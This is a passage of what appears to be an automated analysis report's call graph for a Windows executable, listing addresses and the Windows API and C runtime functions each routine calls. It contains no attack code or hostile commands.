calls 16566->16567 16567->16556 16569 7ff70af0a6be _isindst memcpy_s 16568->16569 16570 7ff70af0a6e6 RtlCaptureContext RtlLookupFunctionEntry 16569->16570 16571 7ff70af0a720 RtlVirtualUnwind 16570->16571 16572 7ff70af0a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16570->16572 16571->16572 16573 7ff70af0a7a8 _isindst 16572->16573 16574 7ff70aefc5c0 _log10_special 8 API calls 16573->16574 16575 7ff70af0a7c7 GetCurrentProcess TerminateProcess 16574->16575 16578 7ff70aef36bc GetModuleFileNameW 16577->16578 16578->16212 16578->16213 16580 7ff70aef9342 16579->16580 16581 7ff70aef932f FindClose 16579->16581 16582 7ff70aefc5c0 _log10_special 8 API calls 16580->16582 16581->16580 16583 7ff70aef371a 16582->16583 16583->16217 16583->16218 16585 7ff70aefc8c0 16584->16585 16586 7ff70aef2c70 GetCurrentProcessId 16585->16586 16615 7ff70aef26b0 16586->16615 16588 7ff70aef2cb9 16619 7ff70af04c48 16588->16619 16591 7ff70aef26b0 48 API calls 16592 7ff70aef2d34 FormatMessageW 16591->16592 16594 7ff70aef2d7f MessageBoxW 16592->16594 16595 7ff70aef2d6d 16592->16595 16597 7ff70aefc5c0 _log10_special 8 API calls 16594->16597 16596 7ff70aef26b0 48 API calls 16595->16596 16596->16594 16598 7ff70aef2daf 16597->16598 16598->16230 16600 7ff70aef93b0 GetFinalPathNameByHandleW CloseHandle 16599->16600 16601 7ff70aef3730 16599->16601 16600->16601 16601->16225 16601->16226 16603 7ff70aef2834 16602->16603 16604 7ff70aef26b0 48 API calls 16603->16604 16605 7ff70aef2887 16604->16605 16606 7ff70af04c48 48 API calls 16605->16606 16607 7ff70aef28d0 MessageBoxW 16606->16607 16608 7ff70aefc5c0 _log10_special 8 API calls 16607->16608 16609 7ff70aef2900 16608->16609 16609->16230 16611 7ff70aef94da WideCharToMultiByte 16610->16611 16612 7ff70aef9505 16610->16612 16611->16612 16614 7ff70aef951b __std_exception_destroy 16611->16614 16613 7ff70aef9522 WideCharToMultiByte 16612->16613 16612->16614 16613->16614 16614->16222 16616 7ff70aef26d5 16615->16616 16617 7ff70af04c48 48 API calls 16616->16617 16618 7ff70aef26f8 16617->16618 16618->16588 16620 7ff70af04ca2 16619->16620 16621 7ff70af04cc7 16620->16621 16623 7ff70af04d03 16620->16623 16622 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16621->16622 16625 7ff70af04cf1 16622->16625 16637 7ff70af03000 16623->16637 16626 7ff70aefc5c0 _log10_special 8 API calls 16625->16626 16628 7ff70aef2d04 16626->16628 16627 7ff70af0a9b8 __free_lconv_mon 11 API calls 16627->16625 16628->16591 16630 7ff70af04e0a 16632 7ff70af04de4 16630->16632 16633 7ff70af04e14 16630->16633 16631 7ff70af04db0 16631->16632 16636 7ff70af04db9 16631->16636 16632->16627 16635 7ff70af0a9b8 __free_lconv_mon 11 API calls 16633->16635 16634 7ff70af0a9b8 __free_lconv_mon 11 API calls 16634->16625 16635->16625 16636->16634 16638 7ff70af0303e 16637->16638 16643 7ff70af0302e 16637->16643 16639 7ff70af03047 16638->16639 16644 7ff70af03075 16638->16644 16641 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16639->16641 16640 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16642 7ff70af0306d 16640->16642 16641->16642 16642->16630 16642->16631 16642->16632 16642->16636 16643->16640 16644->16642 16644->16643 16648 7ff70af03a14 16644->16648 16681 7ff70af03460 16644->16681 16718 7ff70af02bf0 16644->16718 16649 7ff70af03a56 16648->16649 16650 7ff70af03ac7 16648->16650 16651 7ff70af03af1 16649->16651 16652 7ff70af03a5c 16649->16652 16653 7ff70af03b20 16650->16653 16654 7ff70af03acc 16650->16654 16741 7ff70af01dc4 16651->16741 16655 7ff70af03a61 16652->16655 16656 7ff70af03a90 16652->16656 16659 7ff70af03b2a 16653->16659 16660 7ff70af03b37 16653->16660 16664 7ff70af03b2f 16653->16664 16657 7ff70af03b01 16654->16657 16658 7ff70af03ace 16654->16658 16655->16660 16662 7ff70af03a67 16655->16662 16656->16662 16656->16664 16748 7ff70af019b4 16657->16748 16667 7ff70af03add 16658->16667 16671 7ff70af03a70 16658->16671 16659->16651 16659->16664 16755 7ff70af0471c 16660->16755 16668 7ff70af03aa2 16662->16668 16662->16671 16676 7ff70af03a8b 16662->16676 16679 7ff70af03b60 16664->16679 16759 7ff70af021d4 16664->16759 16667->16651 16672 7ff70af03ae2 16667->16672 16668->16679 16731 7ff70af04504 16668->16731 16671->16679 16721 7ff70af041c8 16671->16721 16672->16679 16737 7ff70af045c8 16672->16737 16673 7ff70aefc5c0 _log10_special 8 API calls 16675 7ff70af03e5a 16673->16675 16675->16644 16676->16679 16680 7ff70af03d4c 16676->16680 16766 7ff70af04830 16676->16766 16679->16673 16680->16679 16772 7ff70af0ea78 16680->16772 16682 7ff70af03484 16681->16682 16683 7ff70af0346e 16681->16683 16684 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16682->16684 16687 7ff70af034c4 16682->16687 16685 7ff70af03a56 16683->16685 16686 7ff70af03ac7 16683->16686 16683->16687 16684->16687 16688 7ff70af03af1 16685->16688 16689 7ff70af03a5c 16685->16689 16690 7ff70af03b20 16686->16690 16691 7ff70af03acc 16686->16691 16687->16644 16698 7ff70af01dc4 38 API calls 16688->16698 16692 7ff70af03a61 16689->16692 16693 7ff70af03a90 16689->16693 16696 7ff70af03b2a 16690->16696 16697 7ff70af03b37 16690->16697 16702 7ff70af03b2f 16690->16702 16694 7ff70af03b01 16691->16694 16695 7ff70af03ace 16691->16695 16692->16697 16699 7ff70af03a67 16692->16699 16693->16699 16693->16702 16704 7ff70af019b4 38 API calls 16694->16704 16700 7ff70af03a70 16695->16700 16707 7ff70af03add 16695->16707 16696->16688 16696->16702 16703 7ff70af0471c 45 API calls 16697->16703 16713 7ff70af03a8b 16698->16713 16699->16700 16705 7ff70af03aa2 16699->16705 16699->16713 16701 7ff70af041c8 47 API calls 16700->16701 16716 7ff70af03b60 16700->16716 16701->16713 16706 7ff70af021d4 38 API calls 16702->16706 16702->16716 16703->16713 16704->16713 16708 7ff70af04504 46 API calls 16705->16708 16705->16716 16706->16713 16707->16688 16709 7ff70af03ae2 16707->16709 16708->16713 16711 7ff70af045c8 37 API calls 16709->16711 16709->16716 16710 7ff70aefc5c0 _log10_special 8 API calls 16712 7ff70af03e5a 16710->16712 16711->16713 16712->16644 16714 7ff70af04830 45 API calls 16713->16714 16713->16716 16717 7ff70af03d4c 16713->16717 16714->16717 16715 7ff70af0ea78 46 API calls 16715->16717 16716->16710 16717->16715 16717->16716 16991 7ff70af01038 16718->16991 16722 7ff70af041ee 16721->16722 16784 7ff70af00bf0 16722->16784 16727 7ff70af04830 45 API calls 16729 7ff70af04333 16727->16729 16728 7ff70af04830 45 API calls 16730 7ff70af043c1 16728->16730 16729->16728 16729->16729 16729->16730 16730->16676 16733 7ff70af04539 16731->16733 16732 7ff70af0457e 16732->16676 16733->16732 16734 7ff70af04557 16733->16734 16735 7ff70af04830 45 API calls 16733->16735 16736 7ff70af0ea78 46 API calls 16734->16736 16735->16734 16736->16732 16740 7ff70af045e9 16737->16740 16738 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16739 7ff70af0461a 16738->16739 16739->16676 16740->16738 16740->16739 16742 7ff70af01df7 16741->16742 16743 7ff70af01e26 16742->16743 16745 7ff70af01ee3 16742->16745 16747 7ff70af01e63 16743->16747 16923 7ff70af00c98 16743->16923 16746 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16745->16746 16746->16747 16747->16676 16749 7ff70af019e7 16748->16749 16750 7ff70af01a16 16749->16750 16752 7ff70af01ad3 16749->16752 16751 7ff70af00c98 12 API calls 16750->16751 16754 7ff70af01a53 16750->16754 16751->16754 16753 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16752->16753 16753->16754 16754->16676 16756 7ff70af0475f 16755->16756 16758 7ff70af04763 __crtLCMapStringW 16756->16758 16931 7ff70af047b8 16756->16931 16758->16676 16760 7ff70af02207 16759->16760 16761 7ff70af02236 16760->16761 16763 7ff70af022f3 16760->16763 16762 7ff70af00c98 12 API calls 16761->16762 16765 7ff70af02273 16761->16765 16762->16765 16764 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16763->16764 16764->16765 16765->16676 16767 7ff70af04847 16766->16767 16935 7ff70af0da28 16767->16935 16774 7ff70af0eaa9 16772->16774 16781 7ff70af0eab7 16772->16781 16773 7ff70af0ead7 16776 7ff70af0eae8 16773->16776 16777 7ff70af0eb0f 16773->16777 16774->16773 16775 7ff70af04830 45 API calls 16774->16775 16774->16781 16775->16773 16981 7ff70af10110 16776->16981 16779 7ff70af0eb39 16777->16779 16780 7ff70af0eb9a 16777->16780 16777->16781 16779->16781 16984 7ff70af0f910 16779->16984 16782 7ff70af0f910 _fread_nolock MultiByteToWideChar 16780->16782 16781->16680 16782->16781 16785 7ff70af00c27 16784->16785 16791 7ff70af00c16 16784->16791 16786 7ff70af0d66c _fread_nolock 12 API calls 16785->16786 16785->16791 16787 7ff70af00c54 16786->16787 16788 7ff70af0a9b8 __free_lconv_mon 11 API calls 16787->16788 16790 7ff70af00c68 16787->16790 16788->16790 16789 7ff70af0a9b8 __free_lconv_mon 11 API calls 16789->16791 16790->16789 16792 7ff70af0e5e0 16791->16792 16793 7ff70af0e5fd 16792->16793 16794 7ff70af0e630 16792->16794 16795 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16793->16795 16794->16793 16796 7ff70af0e662 16794->16796 16805 7ff70af04311 16795->16805 16800 7ff70af0e775 16796->16800 16809 7ff70af0e6aa 16796->16809 16797 7ff70af0e867 16847 7ff70af0dacc 16797->16847 16799 7ff70af0e82d 16840 7ff70af0de64 16799->16840 16800->16797 16800->16799 16802 7ff70af0e7fc 16800->16802 16804 7ff70af0e7bf 16800->16804 16806 7ff70af0e7b5 16800->16806 16833 7ff70af0e144 16802->16833 16823 7ff70af0e374 16804->16823 16805->16727 16805->16729 16806->16799 16808 7ff70af0e7ba 16806->16808 16808->16802 16808->16804 16809->16805 16814 7ff70af0a514 16809->16814 16812 7ff70af0a970 _isindst 17 API calls 16813 7ff70af0e8c4 16812->16813 16815 7ff70af0a52b 16814->16815 16816 7ff70af0a521 16814->16816 16817 7ff70af04f78 _get_daylight 11 API calls 16815->16817 16816->16815 16821 7ff70af0a546 16816->16821 16818 7ff70af0a532 16817->16818 16856 7ff70af0a950 16818->16856 16819 7ff70af0a53e 16819->16805 16819->16812 16821->16819 16822 7ff70af04f78 _get_daylight 11 API calls 16821->16822 16822->16818 16859 7ff70af1411c 16823->16859 16827 7ff70af0e41c 16828 7ff70af0e420 16827->16828 16829 7ff70af0e471 16827->16829 16831 7ff70af0e43c 16827->16831 16828->16805 16912 7ff70af0df60 16829->16912 16908 7ff70af0e21c 16831->16908 16834 7ff70af1411c 38 API calls 16833->16834 16835 7ff70af0e18e 16834->16835 16836 7ff70af13b64 37 API calls 16835->16836 16837 7ff70af0e1de 16836->16837 16838 7ff70af0e1e2 16837->16838 16839 7ff70af0e21c 45 API calls 16837->16839 16838->16805 16839->16838 16841 7ff70af1411c 38 API calls 16840->16841 16842 7ff70af0deaf 16841->16842 16843 7ff70af13b64 37 API calls 16842->16843 16844 7ff70af0df07 16843->16844 16845 7ff70af0df0b 16844->16845 16846 7ff70af0df60 45 API calls 16844->16846 16845->16805 16846->16845 16848 7ff70af0db11 16847->16848 16849 7ff70af0db44 16847->16849 16850 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16848->16850 16851 7ff70af0db5c 16849->16851 16853 7ff70af0dbdd 16849->16853 16855 7ff70af0db3d memcpy_s 16850->16855 16852 7ff70af0de64 46 API calls 16851->16852 16852->16855 16854 7ff70af04830 45 API calls 16853->16854 16853->16855 16854->16855 16855->16805 16857 7ff70af0a7e8 _invalid_parameter_noinfo 37 API calls 16856->16857 16858 7ff70af0a969 16857->16858 16858->16819 16860 7ff70af1416f fegetenv 16859->16860 16861 7ff70af17e9c 37 API calls 16860->16861 16865 7ff70af141c2 16861->16865 16862 7ff70af141ef 16867 7ff70af0a514 __std_exception_copy 37 API calls 16862->16867 16863 7ff70af142b2 16864 7ff70af17e9c 37 API calls 16863->16864 16866 7ff70af142dc 16864->16866 16865->16863 16869 7ff70af141dd 16865->16869 16870 7ff70af1428c 16865->16870 16871 7ff70af17e9c 37 API calls 16866->16871 16868 7ff70af1426d 16867->16868 16872 7ff70af15394 16868->16872 16878 7ff70af14275 16868->16878 16869->16862 16869->16863 16873 7ff70af0a514 __std_exception_copy 37 API calls 16870->16873 16874 7ff70af142ed 16871->16874 16875 7ff70af0a970 _isindst 17 API calls 16872->16875 16873->16868 16876 7ff70af18090 20 API calls 16874->16876 16877 7ff70af153a9 16875->16877 16886 7ff70af14356 memcpy_s 16876->16886 16879 7ff70aefc5c0 _log10_special 8 API calls 16878->16879 16880 7ff70af0e3c1 16879->16880 16904 7ff70af13b64 16880->16904 16881 7ff70af146ff memcpy_s 16882 7ff70af14397 memcpy_s 16897 7ff70af14cdb memcpy_s 16882->16897 16902 7ff70af147f3 memcpy_s 16882->16902 16883 7ff70af14a3f 16884 7ff70af13c80 37 API calls 16883->16884 16890 7ff70af15157 16884->16890 16885 7ff70af149eb 16885->16883 16887 7ff70af153ac memcpy_s 37 API calls 16885->16887 16886->16881 16886->16882 16888 7ff70af04f78 _get_daylight 11 API calls 16886->16888 16887->16883 16889 7ff70af147d0 16888->16889 16891 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 16889->16891 16892 7ff70af153ac memcpy_s 37 API calls 16890->16892 16898 7ff70af151b2 16890->16898 16891->16882 16892->16898 16893 7ff70af15338 16895 7ff70af17e9c 37 API calls 16893->16895 16894 7ff70af04f78 11 API calls _get_daylight 16894->16902 16895->16878 16896 7ff70af04f78 11 API calls _get_daylight 16896->16897 16897->16883 16897->16885 16897->16896 16900 7ff70af0a950 37 API calls _invalid_parameter_noinfo 16897->16900 16898->16893 16899 7ff70af13c80 37 API calls 16898->16899 16903 7ff70af153ac memcpy_s 37 API calls 16898->16903 16899->16898 16900->16897 16901 7ff70af0a950 37 API calls _invalid_parameter_noinfo 16901->16902 16902->16885 16902->16894 16902->16901 16903->16898 16905 7ff70af13b83 16904->16905 16906 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16905->16906 16907 7ff70af13bae memcpy_s 16905->16907 16906->16907 16907->16827 16909 7ff70af0e248 memcpy_s 16908->16909 16910 7ff70af04830 45 API calls 16909->16910 16911 7ff70af0e302 memcpy_s 16909->16911 16910->16911 16911->16828 16913 7ff70af0df9b 16912->16913 16916 7ff70af0dfe8 memcpy_s 16912->16916 16914 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16913->16914 16915 7ff70af0dfc7 16914->16915 16915->16828 16917 7ff70af0e053 16916->16917 16919 7ff70af04830 45 API calls 16916->16919 16918 7ff70af0a514 __std_exception_copy 37 API calls 16917->16918 16922 7ff70af0e095 memcpy_s 16918->16922 16919->16917 16920 7ff70af0a970 _isindst 17 API calls 16921 7ff70af0e140 16920->16921 16922->16920 16924 7ff70af00ccf 16923->16924 16930 7ff70af00cbe 16923->16930 16925 7ff70af0d66c _fread_nolock 12 API calls 16924->16925 16924->16930 16926 7ff70af00d00 16925->16926 16927 7ff70af00d14 16926->16927 16928 7ff70af0a9b8 __free_lconv_mon 11 API calls 16926->16928 16929 7ff70af0a9b8 __free_lconv_mon 11 API calls 16927->16929 16928->16927 16929->16930 16930->16747 16932 7ff70af047d6 16931->16932 16933 7ff70af047de 16931->16933 16934 7ff70af04830 45 API calls 16932->16934 16933->16758 16934->16933 16936 7ff70af0da41 16935->16936 16938 7ff70af0486f 16935->16938 16936->16938 16943 7ff70af13374 16936->16943 16939 7ff70af0da94 16938->16939 16940 7ff70af0daad 16939->16940 16941 7ff70af0487f 16939->16941 16940->16941 16978 7ff70af126c0 16940->16978 16941->16680 16955 7ff70af0b1c0 GetLastError 16943->16955 16946 7ff70af133ce 16946->16938 16956 7ff70af0b201 FlsSetValue 16955->16956 16957 7ff70af0b1e4 FlsGetValue 16955->16957 16959 7ff70af0b213 16956->16959 16975 7ff70af0b1f1 16956->16975 16958 7ff70af0b1fb 16957->16958 16957->16975 16958->16956 16961 7ff70af0ec08 _get_daylight 11 API calls 16959->16961 16960 7ff70af0b26d SetLastError 16962 7ff70af0b27a 16960->16962 16963 7ff70af0b28d 16960->16963 16964 7ff70af0b222 16961->16964 16962->16946 16977 7ff70af10348 EnterCriticalSection 16962->16977 16965 7ff70af0a574 __CxxCallCatchBlock 38 API calls 16963->16965 16966 7ff70af0b240 FlsSetValue 16964->16966 16967 7ff70af0b230 FlsSetValue 16964->16967 16970 7ff70af0b292 16965->16970 16968 7ff70af0b24c FlsSetValue 16966->16968 16969 7ff70af0b25e 16966->16969 16971 7ff70af0b239 16967->16971 16968->16971 16972 7ff70af0af64 _get_daylight 11 API calls 16969->16972 16973 7ff70af0a9b8 __free_lconv_mon 11 API calls 16971->16973 16974 7ff70af0b266 16972->16974 16973->16975 16976 7ff70af0a9b8 __free_lconv_mon 11 API calls 16974->16976 16975->16960 16976->16960 16979 7ff70af0b1c0 __CxxCallCatchBlock 45 API calls 16978->16979 16980 7ff70af126c9 16979->16980 16987 7ff70af16df8 16981->16987 16985 7ff70af0f919 MultiByteToWideChar 16984->16985 16990 7ff70af16e5c 16987->16990 16988 7ff70aefc5c0 _log10_special 8 API calls 16989 7ff70af1012d 16988->16989 16989->16781 16990->16988 16992 7ff70af0107f 16991->16992 16993 7ff70af0106d 16991->16993 16995 7ff70af0108d 16992->16995 16999 7ff70af010c9 16992->16999 16994 7ff70af04f78 _get_daylight 11 API calls 16993->16994 16996 7ff70af01072 16994->16996 16997 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 16995->16997 16998 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 16996->16998 17006 7ff70af0107d 16997->17006 16998->17006 17000 7ff70af01445 16999->17000 17002 7ff70af04f78 _get_daylight 11 API calls 16999->17002 17001 7ff70af04f78 _get_daylight 11 API calls 17000->17001 17000->17006 17003 7ff70af016d9 17001->17003 17004 7ff70af0143a 17002->17004 17007 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17003->17007 17005 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17004->17005 17005->17000 17006->16644 17007->17006 17009 7ff70af00774 17008->17009 17036 7ff70af004d4 17009->17036 17011 7ff70af0078d 17011->16241 17048 7ff70af0042c 17012->17048 17016 7ff70aefc8c0 17015->17016 17017 7ff70aef2930 GetCurrentProcessId 17016->17017 17018 7ff70aef1c80 49 API calls 17017->17018 17019 7ff70aef2979 17018->17019 17062 7ff70af049f4 17019->17062 17024 7ff70aef1c80 49 API calls 17025 7ff70aef29ff 17024->17025 17092 7ff70aef2620 17025->17092 17028 7ff70aefc5c0 _log10_special 8 API calls 17029 7ff70aef2a31 17028->17029 17029->16280 17031 7ff70af00189 17030->17031 17035 7ff70aef1b89 17030->17035 17032 7ff70af04f78 _get_daylight 11 API calls 17031->17032 17033 7ff70af0018e 17032->17033 17034 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17033->17034 17034->17035 17035->16279 17035->16280 17037 7ff70af0053e 17036->17037 17038 7ff70af004fe 17036->17038 17037->17038 17040 7ff70af0054a 17037->17040 17039 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17038->17039 17046 7ff70af00525 17039->17046 17047 7ff70af054dc EnterCriticalSection 17040->17047 17046->17011 17049 7ff70af00456 17048->17049 17060 7ff70aef1a20 17048->17060 17050 7ff70af00465 memcpy_s 17049->17050 17051 7ff70af004a2 17049->17051 17049->17060 17054 7ff70af04f78 _get_daylight 11 API calls 17050->17054 17061 7ff70af054dc EnterCriticalSection 17051->17061 17056 7ff70af0047a 17054->17056 17058 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17056->17058 17058->17060 17060->16249 17060->16250 17065 7ff70af04a4e 17062->17065 17063 7ff70af04a73 17066 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17063->17066 17064 7ff70af04aaf 17101 7ff70af02c80 17064->17101 17065->17063 17065->17064 17068 7ff70af04a9d 17066->17068 17071 7ff70aefc5c0 _log10_special 8 API calls 17068->17071 17069 7ff70af04b8c 17070 7ff70af0a9b8 __free_lconv_mon 11 API calls 17069->17070 17070->17068 17073 7ff70aef29c3 17071->17073 17080 7ff70af051d0 17073->17080 17074 7ff70af04b61 17078 7ff70af0a9b8 __free_lconv_mon 11 API calls 17074->17078 17075 7ff70af04bb0 17075->17069 17077 7ff70af04bba 17075->17077 17076 7ff70af04b58 17076->17069 17076->17074 17079 7ff70af0a9b8 __free_lconv_mon 11 API calls 17077->17079 17078->17068 17079->17068 17081 7ff70af0b338 _get_daylight 11 API calls 17080->17081 17082 7ff70af051e7 17081->17082 17083 7ff70aef29e5 17082->17083 17084 7ff70af0ec08 _get_daylight 11 API calls 17082->17084 17087 7ff70af05227 17082->17087 17083->17024 17085 7ff70af0521c 17084->17085 17086 7ff70af0a9b8 __free_lconv_mon 11 API calls 17085->17086 17086->17087 17087->17083 17239 7ff70af0ec90 17087->17239 17090 7ff70af0a970 _isindst 17 API calls 17091 7ff70af0526c 17090->17091 17093 7ff70aef262f 17092->17093 17094 7ff70aef9400 2 API calls 17093->17094 17095 7ff70aef2660 17094->17095 17096 7ff70aef2683 MessageBoxA 17095->17096 17097 7ff70aef266f MessageBoxW 17095->17097 17098 7ff70aef2690 17096->17098 17097->17098 17099 7ff70aefc5c0 _log10_special 8 API calls 17098->17099 17100 7ff70aef26a0 17099->17100 17100->17028 17102 7ff70af02cbe 17101->17102 17103 7ff70af02cae 17101->17103 17104 7ff70af02cc7 17102->17104 17111 7ff70af02cf5 17102->17111 17105 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17103->17105 17106 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17104->17106 17107 7ff70af02ced 17105->17107 17106->17107 17107->17069 17107->17074 17107->17075 17107->17076 17108 7ff70af04830 45 API calls 17108->17111 17110 7ff70af02fa4 17113 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17110->17113 17111->17103 17111->17107 17111->17108 17111->17110 17115 7ff70af03610 17111->17115 17141 7ff70af032d8 17111->17141 17171 7ff70af02b60 17111->17171 17113->17103 17116 7ff70af036c5 17115->17116 17117 7ff70af03652 17115->17117 17120 7ff70af0371f 17116->17120 17121 7ff70af036ca 17116->17121 17118 7ff70af036ef 17117->17118 17119 7ff70af03658 17117->17119 17188 7ff70af01bc0 17118->17188 17128 7ff70af0365d 17119->17128 17132 7ff70af0372e 17119->17132 17120->17118 17120->17132 17139 7ff70af03688 17120->17139 17122 7ff70af036ff 17121->17122 17123 7ff70af036cc 17121->17123 17195 7ff70af017b0 17122->17195 17125 7ff70af0366d 17123->17125 17131 7ff70af036db 17123->17131 17140 7ff70af0375d 17125->17140 17174 7ff70af03f74 17125->17174 17128->17125 17129 7ff70af036a0 17128->17129 17128->17139 17129->17140 17184 7ff70af04430 17129->17184 17131->17118 17134 7ff70af036e0 17131->17134 17132->17140 17202 7ff70af01fd0 17132->17202 17137 7ff70af045c8 37 API calls 17134->17137 17134->17140 17135 7ff70aefc5c0 _log10_special 8 API calls 17136 7ff70af039f3 17135->17136 17136->17111 17137->17139 17139->17140 17209 7ff70af0e8c8 17139->17209 17140->17135 17142 7ff70af032e3 17141->17142 17143 7ff70af032f9 17141->17143 17144 7ff70af036c5 17142->17144 17145 7ff70af03652 17142->17145 17146 7ff70af03337 17142->17146 17143->17146 17147 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17143->17147 17150 7ff70af0371f 17144->17150 17151 7ff70af036ca 17144->17151 17148 7ff70af036ef 17145->17148 17149 7ff70af03658 17145->17149 17146->17111 17147->17146 17154 7ff70af01bc0 38 API calls 17148->17154 17158 7ff70af0365d 17149->17158 17160 7ff70af0372e 17149->17160 17150->17148 17150->17160 17168 7ff70af03688 17150->17168 17152 7ff70af036ff 17151->17152 17153 7ff70af036cc 17151->17153 17156 7ff70af017b0 38 API calls 17152->17156 17155 7ff70af0366d 17153->17155 17162 7ff70af036db 17153->17162 17154->17168 17157 7ff70af03f74 47 API calls 17155->17157 17170 7ff70af0375d 17155->17170 17156->17168 17157->17168 17158->17155 17159 7ff70af036a0 17158->17159 17158->17168 17163 7ff70af04430 47 API calls 17159->17163 17159->17170 17161 7ff70af01fd0 38 API calls 17160->17161 17160->17170 17161->17168 17162->17148 17164 7ff70af036e0 17162->17164 17163->17168 17167 7ff70af045c8 37 API calls 17164->17167 17164->17170 17165 7ff70aefc5c0 _log10_special 8 API calls 17166 7ff70af039f3 17165->17166 17166->17111 17167->17168 17169 7ff70af0e8c8 47 API calls 17168->17169 17168->17170 17169->17168 17170->17165 17222 7ff70af00d84 17171->17222 17175 7ff70af03f96 17174->17175 17176 7ff70af00bf0 12 API calls 17175->17176 17177 7ff70af03fde 17176->17177 17178 7ff70af0e5e0 46 API calls 17177->17178 17180 7ff70af040b1 17178->17180 17179 7ff70af040d3 17182 7ff70af0415c 17179->17182 17183 7ff70af04830 45 API calls 17179->17183 17180->17179 17181 7ff70af04830 45 API calls 17180->17181 17181->17179 17182->17139 17183->17182 17185 7ff70af044b0 17184->17185 17186 7ff70af04448 17184->17186 17185->17139 17186->17185 17187 7ff70af0e8c8 47 API calls 17186->17187 17187->17185 17189 7ff70af01bf3 17188->17189 17190 7ff70af01c22 17189->17190 17192 7ff70af01cdf 17189->17192 17191 7ff70af00bf0 12 API calls 17190->17191 17194 7ff70af01c5f 17190->17194 17191->17194 17193 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17192->17193 17193->17194 17194->17139 17196 7ff70af017e3 17195->17196 17197 7ff70af01812 17196->17197 17199 7ff70af018cf 17196->17199 17198 7ff70af00bf0 12 API calls 17197->17198 17201 7ff70af0184f 17197->17201 17198->17201 17200 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17199->17200 17200->17201 17201->17139 17203 7ff70af02003 17202->17203 17204 7ff70af02032 17203->17204 17206 7ff70af020ef 17203->17206 17205 7ff70af00bf0 12 API calls 17204->17205 17208 7ff70af0206f 17204->17208 17205->17208 17207 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17206->17207 17207->17208 17208->17139 17210 7ff70af0e8f0 17209->17210 17211 7ff70af0e935 17210->17211 17213 7ff70af04830 45 API calls 17210->17213 17215 7ff70af0e8f5 memcpy_s 17210->17215 17218 7ff70af0e91e memcpy_s 17210->17218 17211->17215 17211->17218 17219 7ff70af10858 17211->17219 17212 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17212->17215 17213->17211 17215->17139 17218->17212 17218->17215 17221 7ff70af1087c WideCharToMultiByte 17219->17221 17223 7ff70af00dc3 17222->17223 17224 7ff70af00db1 17222->17224 17226 7ff70af00e0d 17223->17226 17228 7ff70af00dd0 17223->17228 17225 7ff70af04f78 _get_daylight 11 API calls 17224->17225 17227 7ff70af00db6 17225->17227 17231 7ff70af00eb6 17226->17231 17232 7ff70af04f78 _get_daylight 11 API calls 17226->17232 17229 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17227->17229 17230 7ff70af0a884 _invalid_parameter_noinfo 37 API calls 17228->17230 17236 7ff70af00dc1 17229->17236 17230->17236 17233 7ff70af04f78 _get_daylight 11 API calls 17231->17233 17231->17236 17234 7ff70af00eab 17232->17234 17235 7ff70af00f60 17233->17235 17237 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17234->17237 17238 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17235->17238 17236->17111 17237->17231 17238->17236 17244 7ff70af0ecad 17239->17244 17240 7ff70af0ecb2 17241 7ff70af0524d 17240->17241 17242 7ff70af04f78 _get_daylight 11 API calls 17240->17242 17241->17083 17241->17090 17243 7ff70af0ecbc 17242->17243 17245 7ff70af0a950 _invalid_parameter_noinfo 37 API calls 17243->17245 17244->17240 17244->17241 17246 7ff70af0ecfc 17244->17246 17245->17241 17246->17241 17247 7ff70af04f78 _get_daylight 11 API calls 17246->17247 17247->17243 17249 7ff70aef8823 __std_exception_destroy 17248->17249 17250 7ff70aef87a1 GetTokenInformation 17248->17250 17253 7ff70aef8836 CloseHandle 17249->17253 17254 7ff70aef883c 17249->17254 17251 7ff70aef87c2 GetLastError 17250->17251 17252 7ff70aef87cd 17250->17252 17251->17249 17251->17252 17252->17249 17255 7ff70aef87e9 GetTokenInformation 17252->17255 17253->17254 17254->16298 17255->17249 17256 7ff70aef880c 17255->17256 17256->17249 17257 7ff70aef8816 ConvertSidToStringSidW 17256->17257 17257->17249 17259 7ff70aefc8c0 17258->17259 17260 7ff70aef2b74 GetCurrentProcessId 17259->17260 17261 7ff70aef26b0 48 API calls 17260->17261 17262 7ff70aef2bc7 17261->17262 17263 7ff70af04c48 48 API calls 17262->17263 17264 7ff70aef2c10 MessageBoxW 17263->17264 17265 7ff70aefc5c0 _log10_special 8 API calls 17264->17265 17266 7ff70aef2c40 17265->17266 17266->16309 17268 7ff70aef25e5 17267->17268 17269 7ff70af04c48 48 API calls 17268->17269 17270 7ff70aef2604 17269->17270 17270->16317 17316 7ff70af08804 17271->17316 17275 7ff70aef81cc 17274->17275 17276 7ff70aef9400 2 API calls 17275->17276 17277 7ff70aef81eb 17276->17277 17278 7ff70aef8206 ExpandEnvironmentStringsW 17277->17278 17279 7ff70aef81f3 17277->17279 17281 7ff70aef822c __std_exception_destroy 17278->17281 17280 7ff70aef2810 49 API calls 17279->17280 17282 7ff70aef81ff __std_exception_destroy 17280->17282 17283 